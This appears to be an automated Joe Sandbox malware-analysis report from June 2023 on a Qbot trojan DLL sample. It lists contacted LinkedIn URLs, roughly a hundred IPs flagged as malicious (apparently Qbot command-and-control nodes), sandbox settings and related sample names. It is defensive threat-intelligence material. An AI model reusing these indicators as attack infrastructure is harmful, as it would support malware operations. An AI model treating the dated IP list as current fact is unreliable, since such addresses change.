                                                                                                                              https://static.licdn.com/aero-v1/sc/h/51t74mlo1ty7vakn3a80a9jcp1X93SLWC.htm.22.drfalse
                                                                                                                                high
                                                                                                                                https://static.licdn.com/aero-v1/sc/h/8fkga714vy9b2wk5auqo5reeb1X93SLWC.htm.22.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.linkedin.com/learning/topics/data-science?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                    high
                                                                                                                                    https://cr.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.linkedin.com/learning/topics/mobile-development?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                        high
                                                                                                                                        https://gt.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                          high
                                                                                                                                          https://ph.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.linkedin.com/learning/topics/leadership-and-management?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.linkedin.com/learning/topics/network-and-system-administration?trk=homepage-basic_learni1X93SLWC.htm.22.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.linkedin.com/learning/search?trk=guest_homepage-basic_guest_nav_menu_learning1X93SLWC.htm.22.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.linkedin.com/learning/topics/customer-service-3?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.linkedin.com/jobs/jobs-in-h1X93SLWC.htm.22.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://fr.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://mobile.linkedin.com/?trk=homepage-basic_directory_mobileMicrositeUrl1X93SLWC.htm.22.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.linkedin.com/jobs/purchasing-jobs-h1X93SLWC.htm.22.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.linkedin.com/learning/topics/security-3?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.linkedin.com/learning/search?trk=homepage-basic_brand-discovery_intent-module-thirdBtn1X93SLWC.htm.22.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.linkedin.com/learning/topics/it-help-desk-5?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.linkedin.com/jobs/arts-and-design-jobs-h1X93SLWC.htm.22.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.linkedin.com/directory/products?trk=homepage-basic_directory_productsDirectoryUrl1X93SLWC.htm.22.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://business.linkedin.com/talent-solutions?src=li-footer&amp;utm_source=linkedin&amp;utm_medium=1X93SLWC.htm.22.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.linkedin.com/directory/news?trk=homepage-basic_directory_newsDirectoryUrl1X93SLWC.htm.22.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://zw.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://co.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://ru.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://ca.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://ke.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.linkedin.com/learning/topics/career-development-5?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.linkedin.com/mypreferences/g/guest-cookies1X93SLWC.htm.22.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.linkedin.com/products?trk=homepage-basic_directory_productsHomeUrl1X93SLWC.htm.22.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://static.licdn.com/aero-v1/sc/h/7kb6sn3tm4cx918cx9a5jlb01X93SLWC.htm.22.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://static.licdn.com/aero-v1/sc/h/8wykgzgbqy0t3fnkgborvz54u1X93SLWC.htm.22.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://static.licdn.com/aero-v1/sc/h/9r7bzghkywart99je65bjx5yl1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://de.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://static.licdn.com/aero-v1/sc/h/2r8kd5zqpi905lkzsshdlvvn51X93SLWC.htm.22.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.linkedin.com/jobs/retail-associate-jobs-h1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.linkedin.com/learning/topics/product-and-manufacturing?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.linkedin.com/psettings/guest-controls?trk=homepage-basic_footer-guest-controls1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://business.linkedin.com/marketing-solutions?src=li-footer&amp;utm_source=linkedin&amp;utm_medi1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://static.licdn.com/aero-v1/sc/h/5anw0ar72zvn8xrzj6wvz3jl61X93SLWC.htm.22.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.linkedin.com/help/linkedin?lang=en&amp;trk=homepage-basic_directory_helpCenterUrl1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://pk.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://jp.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://www.linkedin.com/learning/topics/human-resources-3?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://static.licdn.com/aero-v1/sc/h/al2o9zrvru7aqj8e1x2rzsrca1X93SLWC.htm.22.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        38.2.18.164
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        174COGENT-174UStrue
                                                                                                                                                                                                                        2.82.8.80
                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                        3243MEO-RESIDENCIALPTtrue
                                                                                                                                                                                                                        70.160.67.203
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                                        83.110.223.61
                                                                                                                                                                                                                        unknownUnited Arab Emirates
                                                                                                                                                                                                                        5384EMIRATES-INTERNETEmiratesInternetAEtrue
                                                                                                                                                                                                                        209.171.160.69
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        852ASN852CAtrue
                                                                                                                                                                                                                        84.215.202.8
                                                                                                                                                                                                                        unknownNorway
                                                                                                                                                                                                                        41164GET-NOGETNorwayNOtrue
                                                                                                                                                                                                                        184.182.66.109
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                                        200.84.211.255
                                                                                                                                                                                                                        unknownVenezuela
                                                                                                                                                                                                                        8048CANTVServiciosVenezuelaVEtrue
                                                                                                                                                                                                                        125.99.69.178
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                                                                                                                                                        174.4.89.3
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        6327SHAWCAtrue
                                                                                                                                                                                                                        121.121.108.120
                                                                                                                                                                                                                        unknownMalaysia
                                                                                                                                                                                                                        9534MAXIS-AS1-APBinariangBerhadMYtrue
                                                                                                                                                                                                                        161.142.103.187
                                                                                                                                                                                                                        unknownMalaysia
                                                                                                                                                                                                                        9930TTNET-MYTIMEdotComBerhadMYtrue
                                                                                                                                                                                                                        213.64.33.92
                                                                                                                                                                                                                        unknownSweden
                                                                                                                                                                                                                        3301TELIANET-SWEDENTeliaCompanySEtrue
                                                                                                                                                                                                                        114.143.176.236
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        17762HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdINtrue
                                                                                                                                                                                                                        24.234.220.88
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                                        67.70.120.249
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        577BACOMCAtrue
                                                                                                                                                                                                                        73.88.173.113
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        7922COMCAST-7922UStrue
                                                                                                                                                                                                                        72.205.104.134
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                                        117.195.17.148
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        9829BSNL-NIBNationalInternetBackboneINtrue
                                                                                                                                                                                                                        69.160.121.6
                                                                                                                                                                                                                        unknownJamaica
                                                                                                                                                                                                                        33576DIG001JMtrue
                                                                                                                                                                                                                        176.133.4.230
                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                        5410BOUYGTEL-ISPFRtrue
                                                                                                                                                                                                                        183.87.163.165
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        132220JPRDIGITAL-INJPRDigitalPvtLtdINtrue
                                                                                                                                                                                                                        184.181.75.148
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                                        70.49.205.198
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        577BACOMCAtrue
                                                                                                                                                                                                                        87.221.153.182
                                                                                                                                                                                                                        unknownSpain
                                                                                                                                                                                                                        12479UNI2-ASEStrue
                                                                                                                                                                                                                        70.50.1.252
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        577BACOMCAtrue
                                                                                                                                                                                                                        85.101.239.116
                                                                                                                                                                                                                        unknownTurkey
                                                                                                                                                                                                                        9121TTNETTRtrue
                                                                                                                                                                                                                        181.4.225.225
                                                                                                                                                                                                                        unknownArgentina
                                                                                                                                                                                                                        7303TelecomArgentinaSAARtrue
                                                                                                                                                                                                                        100.4.163.158
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        701UUNETUStrue
                                                                                                                                                                                                                        103.141.50.43
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        133693SKISP-AS-INSriKrishnaInternetServicesPrivateLimitedItrue
                                                                                                                                                                                                                        70.50.83.216
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        577BACOMCAtrue
                                                                                                                                                                                                                        92.1.170.110
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
                                                                                                                                                                                                                        64.121.161.102
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        6079RCN-ASUStrue
                                                                                                                                                                                                                        96.56.197.26
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        6128CABLE-NET-1UStrue
                                                                                                                                                                                                                        188.28.19.84
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        206067H3GUKGBtrue
                                                                                                                                                                                                                        125.99.76.102
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                                                                                                                                                        81.101.185.146
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        5089NTLGBtrue
                                                                                                                                                                                                                        116.75.63.183
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                                                                                                                                                        124.246.122.199
                                                                                                                                                                                                                        unknownSingapore
                                                                                                                                                                                                                        63850ENTRUSTICT-AS-APQRHUBPTYLTDTAEntrustICTAUtrue
                                                                                                                                                                                                                        147.147.30.126
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        6871PLUSNETUKInternetServiceProviderGBtrue
                                                                                                                                                                                                                        109.130.247.84
                                                                                                                                                                                                                        unknownBelgium
                                                                                                                                                                                                                        5432PROXIMUS-ISP-ASBEtrue
                                                                                                                                                                                                                        75.109.111.89
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        19108SUDDENLINK-COMMUNICATIONSUStrue
                                                                                                                                                                                                                        88.126.94.4
                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                        12322PROXADFRtrue
                                                                                                                                                                                                                        124.122.47.148
                                                                                                                                                                                                                        unknownThailand
                                                                                                                                                                                                                        17552TRUE-AS-APTrueInternetCoLtdTHtrue
                                                                                                                                                                                                                        66.241.183.99
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        16604HUNTEL-NETUStrue
                                                                                                                                                                                                                        180.151.19.13
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        10029SHYAMSPECTRA-ASSHYAMSPECTRAPVTLTDINtrue
                                                                                                                                                                                                                        94.204.202.106
                                                                                                                                                                                                                        unknownUnited Arab Emirates
                                                                                                                                                                                                                        15802DU-AS1AEtrue
                                                                                                                                                                                                                        47.205.25.170
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        5650FRONTIER-FRTRUStrue
                                                                                                                                                                                                                        95.45.50.93
                                                                                                                                                                                                                        unknownIreland
                                                                                                                                                                                                                        5466EIRCOMInternetHouseIEtrue
                                                                                                                                                                                                                        103.212.19.254
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        132956VNET-ASVNETNETWORKSPVTLTDINtrue
                                                                                                                                                                                                                        85.61.165.153
                                                                                                                                                                                                                        unknownSpain
                                                                                                                                                                                                                        12479UNI2-ASEStrue
                                                                                                                                                                                                                        91.160.70.68
                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                        12322PROXADFRtrue
                                                                                                                                                                                                                        201.143.215.69
                                                                                                                                                                                                                        unknownMexico
                                                                                                                                                                                                                        8151UninetSAdeCVMXtrue
                                                                                                                                                                                                                        184.63.133.131
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        7155VIASAT-SP-BACKBONEUStrue
                                                                                                                                                                                                                        203.109.44.236
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        135777NECONN-ASShreenortheastConnectAndServicesPvtLtdINtrue
                                                                                                                                                                                                                        90.104.151.37
                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                        3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                                        201.244.108.183
                                                                                                                                                                                                                        unknownColombia
                                                                                                                                                                                                                        19429ETB-ColombiaCOtrue
                                                                                                                                                                                                                        2.49.63.160
                                                                                                                                                                                                                        unknownUnited Arab Emirates
                                                                                                                                                                                                                        5384EMIRATES-INTERNETEmiratesInternetAEtrue
                                                                                                                                                                                                                        103.42.86.42
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        133660EDIGITAL-ASE-InfrastructureandEntertainmentIndiaPvtLttrue
                                                                                                                                                                                                                        80.6.50.34
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        5089NTLGBtrue
                                                                                                                                                                                                                        175.156.217.7
                                                                                                                                                                                                                        unknownSingapore
                                                                                                                                                                                                                        4773MOBILEONELTD-AS-APMobileOneLtdMobileInternetServicePrtrue
                                                                                                                                                                                                                        103.139.242.6
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        138798MUTINY-AS-INMutinySystemsPrivateLimitedINtrue
                                                                                                                                                                                                                        27.0.48.233
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        132573SAINGN-AS-INSAINGNNetworkServicesINtrue
                                                                                                                                                                                                                        70.28.50.223
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        577BACOMCAtrue
                                                                                                                                                                                                                        173.17.45.60
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        30036MEDIACOM-ENTERPRISE-BUSINESSUStrue
                                                                                                                                                                                                                        81.229.117.95
                                                                                                                                                                                                                        unknownSweden
                                                                                                                                                                                                                        3301TELIANET-SWEDENTeliaCompanySEtrue
                                                                                                                                                                                                                        70.64.77.115
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        6327SHAWCAtrue
                                                                                                                                                                                                                        87.252.106.39
                                                                                                                                                                                                                        unknownItaly
                                                                                                                                                                                                                        48544TECNOADSL-ASITtrue
                                                                                                                                                                                                                        79.77.142.22
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        9105TISCALI-UKTalkTalkCommunicationsLimitedGBtrue
                                                                                                                                                                                                                        98.163.227.79
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                                        93.187.148.45
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        8680SURE-INTERNATIONAL-LIMITEDGBtrue
                                                                                                                                                                                                                        186.75.95.6
                                                                                                                                                                                                                        unknownPanama
                                                                                                                                                                                                                        11556CableWirelessPanamaPAtrue
                                                                                                                                                                                                                        50.68.186.195
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        6327SHAWCAtrue
                                                                                                                                                                                                                        45.62.70.33
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        40440NRTC-CAtrue
                                                                                                                                                                                                                        83.249.198.100
                                                                                                                                                                                                                        unknownSweden
                                                                                                                                                                                                                        39651COMHEM-SWEDENSEtrue
                                                                                                                                                                                                                        12.172.173.82
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        2386INS-ASUStrue
                                                                                                                                                                                                                        47.199.241.39
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        5650FRONTIER-FRTRUStrue
                                                                                                                                                                                                                        79.168.224.165
                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                        2860NOS_COMUNICACOESPTtrue
                                                                                                                                                                                                                        199.27.66.213
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        40608HCTNEBRASKAUStrue
                                                                                                                                                                                                                        200.44.198.47
                                                                                                                                                                                                                        unknownVenezuela
                                                                                                                                                                                                                        8048CANTVServiciosVenezuelaVEtrue
                                                                                                                                                                                                                        176.142.207.63
                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                        5410BOUYGTEL-ISPFRtrue
                                                                                                                                                                                                                        86.173.2.12
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        2856BT-UK-ASBTnetUKRegionalnetworkGBtrue
                                                                                                                                                                                                                        45.62.75.250
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        40440NRTC-CAtrue
                                                                                                                                                                                                                        92.154.17.149
                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                        3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                                        90.29.86.138
                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                        3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                                        174.58.146.57
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        7922COMCAST-7922UStrue
                                                                                                                                                                                                                        223.166.13.95
                                                                                                                                                                                                                        unknownChina
                                                                                                                                                                                                                        17621CNCGROUP-SHChinaUnicomShanghainetworkCNtrue
                                                                                                                                                                                                                        5.192.141.228
                                                                                                                                                                                                                        unknownUnited Arab Emirates
                                                                                                                                                                                                                        5384EMIRATES-INTERNETEmiratesInternetAEtrue
                                                                                                                                                                                                                        65.95.141.84
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        577BACOMCAtrue
                                                                                                                                                                                                                        75.98.154.19
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        32444SAFELINK-MVUStrue
                                                                                                                                                                                                                        77.126.99.230
                                                                                                                                                                                                                        unknownIsrael
                                                                                                                                                                                                                        9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystetrue
                                                                                                                                                                                                                        103.123.223.133
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        138329KWS-AS-APKenstarWebSolutionsPrivateLimitedINtrue
                                                                                                                                                                                                                        74.12.147.139
                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                        577BACOMCAtrue
                                                                                                                                                                                                                        92.9.45.20
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
                                                                                                                                                                                                                        113.11.92.30
                                                                                                                                                                                                                        unknownBangladesh
                                                                                                                                                                                                                        7565BDCOM-BDRangsNiluSquare5thFloorHouse75Road5ADtrue
                                                                                                                                                                                                                        77.86.98.236
                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                        12390KINGSTON-UK-ASGBtrue
                                                                                                                                                                                                                        103.140.174.20
                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                        138763PRAVEEN1-ASPraveenTelecomPvtLtdINtrue
                                                                                                                                                                                                                        78.192.109.105
                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                        12322PROXADFRtrue
                                                                                                                                                                                                                        78.82.143.154
                                                                                                                                                                                                                        unknownSweden
                                                                                                                                                                                                                        2119TELENOR-NEXTELTelenorNorgeASNOtrue
                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                        192.168.2.1
                                                                                                                                                                                                                        Joe Sandbox Version:37.1.0 Beryl
                                                                                                                                                                                                                        Analysis ID:882935
                                                                                                                                                                                                                        Start date and time:2023-06-07 01:03:42 +02:00
                                                                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 11m 36s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                        Number of analysed new started processes analysed:26
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • HDC enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample file name:042_qbot.dll.dll
                                                                                                                                                                                                                        (renamed file extension from dat to dll, renamed because original name is a hash value)
                                                                                                                                                                                                                        Original Sample Name:042_qbot.dll.dat
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.evad.winDLL@30/19@2/100
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                                                                        HDC Information:
                                                                                                                                                                                                                        • Successful, ratio: 27.4% (good quality ratio 26.1%)
                                                                                                                                                                                                                        • Quality average: 78.2%
                                                                                                                                                                                                                        • Quality standard deviation: 25.4%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        • Number of executed functions: 23
                                                                                                                                                                                                                        • Number of non-executed functions: 44
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Override analysis time to 240s for rundll32
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.42.65.92, 13.107.42.14
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): www-linkedin-com.l-0005.l-msedge.net, l-0005.l-msedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com
                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 5436 because there are no executed function
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        01:04:46API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                                                                                                                                                        01:04:48API Interceptor4x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                        01:04:56API Interceptor9x Sleep call for process: wermgr.exe modified
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        38.2.18.164050_qbot.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                          051_qbot.dll.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                            050_qbot.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                              qbot1.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                distantly.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                  2.82.8.80batteryacid.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                    050_qbot.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                      051_qbot.dll.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                        050_qbot.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                          qbot1.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                            distantly.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                              qbot1.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                oOo.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                  photographed.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                    F086.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                      A649.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                        F072.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                          F086.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                            A290.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                              A649.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                5q4psw.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                  15dasx.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                    5q4psw.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      MEO-RESIDENCIALPTbatteryacid.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 37.189.89.196
                                                                                                                                                                                                                                                                      050_qbot.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      051_qbot.dll.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      050_qbot.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      MtaQNlIGAH.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 85.245.52.8
                                                                                                                                                                                                                                                                      wuXRy6x0DL.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 188.80.226.115
                                                                                                                                                                                                                                                                      droidbotGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 85.247.209.200
                                                                                                                                                                                                                                                                      LNV3upV1D7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 144.67.94.28
                                                                                                                                                                                                                                                                      YX6QtfYohw.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 85.244.176.127
                                                                                                                                                                                                                                                                      pfbZRXBuZY.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 85.244.28.236
